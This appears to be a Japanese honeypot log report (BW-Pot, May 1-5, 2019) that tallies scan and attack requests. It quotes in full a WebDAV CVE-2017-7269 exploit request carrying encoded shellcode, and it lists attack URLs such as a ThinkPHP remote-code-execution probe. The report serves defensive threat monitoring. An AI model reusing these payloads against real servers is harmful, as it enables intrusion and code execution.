BW-Potのログ分析 (2019/05/01-2019/05/05)
期間内の総アクセス件数は2,577件です。送信元IP数は449IPです。
・気になる通信
リクエストヘッダを細工するタイプの通信が来ておりました。
WebDAVの脆弱性(CVE-2017-7269)に関する通信の模様です。
文字化けしておりますが以下のPOCかと思われます。
Host: localhost Connection: Close Content-Length: 0 If: <http://localhost/aaaaaaa潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘橑牁䈱瀵塐㙤汇㔹呪倴呃睒偡㈲测水㉇扁㝍兡塢䝳剐㙰畄桪㍴乊硫䥶乳䱪坺潱塊㈰㝮䭉前䡣潌畖畵景癨䑍偰稶手敗畐橲穫睢癘扈攱ご汹偊呢倳㕷橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍Ꮐ栃䠴攱潃湦瑁䍬Ꮐ栃千橁灒㌰塦䉌灋捆关祁穐䩬> (Not <locktoken:write1>) <http://localhost/bbbbbbb祈慵佃潧歯䡅㙆杵䐳㡱坥婢吵噡楒橓兗㡎奈捕䥱䍤摲㑨䝘煹㍫歕浈偏穆㑱潔瑃奖潯獁㑗慨穲㝅䵉坎呈䰸㙺㕲扦湃䡭㕈慷䵚慴䄳䍥割浩㙱乤渹捓此兆估硯牓材䕓穣焹体䑖漶獹桷穖慊㥅㘹氹䔱㑲卥塊䑎穄氵婖扁湲昱奙吳ㅂ塥奁煐〶坷䑗卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ㅶ湯ⓣ栁ᑠ栃̀翾Ꮐ栃Ѯ栃煮瑰ᐴ栃⧧栁鎑栀㤱普䥕げ呫癫牊祡ᐜ栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB9lk8sYkPkPypC0CY7uNQfr1TdKNrP0TKPRlLDKaBMDtKqbkxjoh70JNFP1yoP17PDlMls1QlYrnLmP7QXOlMZaI7K2hp22Nw4KqBjpBk12oLKQJ02kq03HE5WPQdOZm18PB0tKMxlXbk0XO0m1j3zCml0IrkLt2kiqxVnQYo01upvLva6ojmyqfgLxyPd5Xt9sQmHxoKqmLdSExbnxBk1Ho49qXSC6rkjlpK2kb8mLja8SDKjdDKKQ6pu90DmTNDaKqKOq1IPZr19ogpOhOo0ZtKzrXksVomqXPnc5qdm0ph1g2IPn0i2iJFR40hPLsGKvIwIoz5P1ioNwaGnw0WofRHnZofSIuWioJ5XkOpQKlqy921nqPjkSoanqrJPPr3r0Ph27ayCoev9oYEXk0OqImaFrNrBHkPp2aPtDNrNrB2r10Rb0S8hknunNoKkOZ5E96faZjp1KRHaplsipKPQygprJm4R0BJkoNvrHQenfeNTFIoiE019oogogNw27QF2HNMjfJxsKkOIEbeupqeMVNkZordu3kPM09pHkXQwyVDYpKPKPK8fLyoKOyonOpibMpa1W2Ed3NO1Qc2RCnONdpLnN0pS82PkPXkRKMay0Oo20BJm20jm2B01ZYrpjM20Wc88ZYfYJpO9o6u63MawP2FfXkTm3O9i4r4BmnlO4m8ma90vTLC2021ofc8LRV62iiRYoYEReEpqdLmNxu5EprTJvqZm0OdR0bmoTo4jl0Pb3bHLm1GFN1Kiovuu3JL9tHkXNpSc8FfRvqwnryoWeRJYpqGbHlq2kBOqwiovuaZkPBHXpee3rqFIo9EXhdPIoyo9oMsmjnOnOnrS5RC1ic3RLbE0rloloBS2VOsph2O2SsDlns51hPeIphhIbKNioKOp109OBLnmaP4mdlnP105P0nNNQoHLxkPAA>
件数 | 種別 | リクエスト |
728 | WordPressに関する調査 | GET /wp-login.php |
722 | WordPressに対するブルートフォース攻撃 | POST /wp-login.php |
713 | Bad Request | |
241 | アクセス | GET / |
17 | 不正中継の調査 | GET api.ipify[.]org/ |
8 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
7 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
6 | ZmEuによるスキャン | GET /phpMyAdmin/scripts/setup.php |
6 | ZmEuによるスキャン | GET /phpmyadmin/scripts/setup.php |
6 | ZmEuによるスキャン | GET /pma/scripts/setup.php |
6 | ZmEuによるスキャン | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
5 | 環境設定の調査 | GET /.env |
4 | ThinkPHPに関する調査 | GET /TP/public/index.php |
4 | ThinkPHPに対する攻撃 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
4 | 環境設定の調査 | GET /api/.env |
4 | 不明 | GET /nx8j78af1b.jsp |
4 | ZmEuによるスキャン | GET /phpmy/scripts/setup.php |
4 | ThinkPHPに対する攻撃 | POST /TP/public/index.php?s=captcha |
3 | アクセス | GET /favicon.ico |
3 | クローリング | GET /robots.txt |
3 | 不正中継の調査 | GET 5.188.210.101/echo.php |
2 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
2 | 不明 | GET /admin/ |
2 | WordPressに関する調査 | GET /blog/wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /cms/wp-includes/wlwmanifest.xml |
2 | WebLogic に関する調査 | GET /console/login/LoginForm.jsp |
2 | 不明 | GET /db/ |
2 | WordPressに関する調査 | GET /dev/wp-includes/wlwmanifest.xml |
2 | Apache Struts 2に関する調査 | GET /index.action |
2 | JMXコンソールに関する調査 | GET /jmx-console/ |
2 | ZmEuによるスキャン phpMyAdminに関する調査 | GET /myadmin/scripts/setup.php |
2 | 不明 | GET /pma/ |
2 | WordPressに関する調査 | GET /site/wp-includes/wlwmanifest.xml |
2 | サイトの構成調査 | GET /sitemap.xml |
2 | WordPressに関する調査 | GET /web/wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /website/wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /wordpress/wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /wp/wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /wwww/wp-includes/wlwmanifest.xml |
2 | クローリング | HEAD /robots.txt |
2 | Spring Data Commonsの脆弱性(CVE-2018-1273)に関する攻撃 | POST /users?page=&size=5 |
1 | Laravelに関する調査 | GET /.env.example |
1 | Gitに関する調査 | GET /.git/config |
1 | WordPressのユーザー情報の取得 | GET ///?author=1 |
1 | WordPressのユーザー情報の取得 | GET ///wp-json/wp/v2/users/ |
1 | phpListに関する調査 | GET /Lists/admin.php |
1 | ZmEuによるスキャン phpMyAdminに関する調査 | GET /MyAdmin/scripts/setup.php |
1 | Tomato RAFに関する調査 | GET /admin-scripts.asp |
1 | FreePBXに関する調査 | GET /admin//config.php |
1 | Kubernetesに関する調査 | GET /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ |
1 | ZmEuによるスキャン phpMyAdminに関する調査 | GET /db/scripts/setup.php |
1 | Apache Strutsに関する調査 | GET /index.do |
1 | WordPressに関する調査 | GET /press/wp-login.php |
1 | 不明 | GET /script |
1 | Apache Struts 2に関する調査 | GET /struts2-rest-showcase/orders.xhtml |
1 | DFindによるスキャン | GET /w00tw00t.at.ISC.SANS.DFind:) |
1 | WebDAVに関する調査 | GET /webdav/ |
1 | WordPressに関する調査 | GET /wordpress1/wp-login.php |
1 | WordPressに関する調査 | GET /wordpress2/wp-login.php |
1 | WordPressに関する調査 | GET /wordpress3/wp-login.php |
1 | WordPressに関する調査 | GET /wordpress4/wp-login.php |
1 | WordPressに関する調査 | GET /wordpress5/wp-login.php |
1 | WordPressに関する調査 | GET /wordpress6/wp-login.php |
1 | WordPressのユーザー情報の取得 | GET /wp-json/wp/v2/users/ |
1 | WordPressに関する調査 | GET /wp/wp-login.php |
1 | WordPressに関する調査 | GET /wp2/wp-login.php |
1 | WordPressに関する調査 | GET /wp4/wp-login.php |
1 | WordPressに関する調査 | GET /wp5/wp-login.php |
1 | WordPressに関する調査 | GET /wp6/wp-login.php |
1 | WordPressに関する調査 | GET /wp7/wp-login.php |
1 | WordPressに関する調査 | GET /wp8/wp-login.php |
1 | 不正中継の調査 | GET api.binance[.]com/api/v1/depth?symbol=ETHBTC |
1 | 不正中継の調査 | GET www.binance[.]com/api/v1/depth?symbol=ETHBTC |
1 | 不正中継の調査 | GET www.proxylists[.]net/proxyjudge.php |
1 | アクセス | HEAD / |
1 | 不明 | OPTIONS / |
1 | Linksysの脆弱性に関する攻撃 | POST 192.168.0[.]14/tmUnblock.cgi |
1 | WebDAVの脆弱性(CVE-2017-7269)に関する攻撃 | PROPFIND / |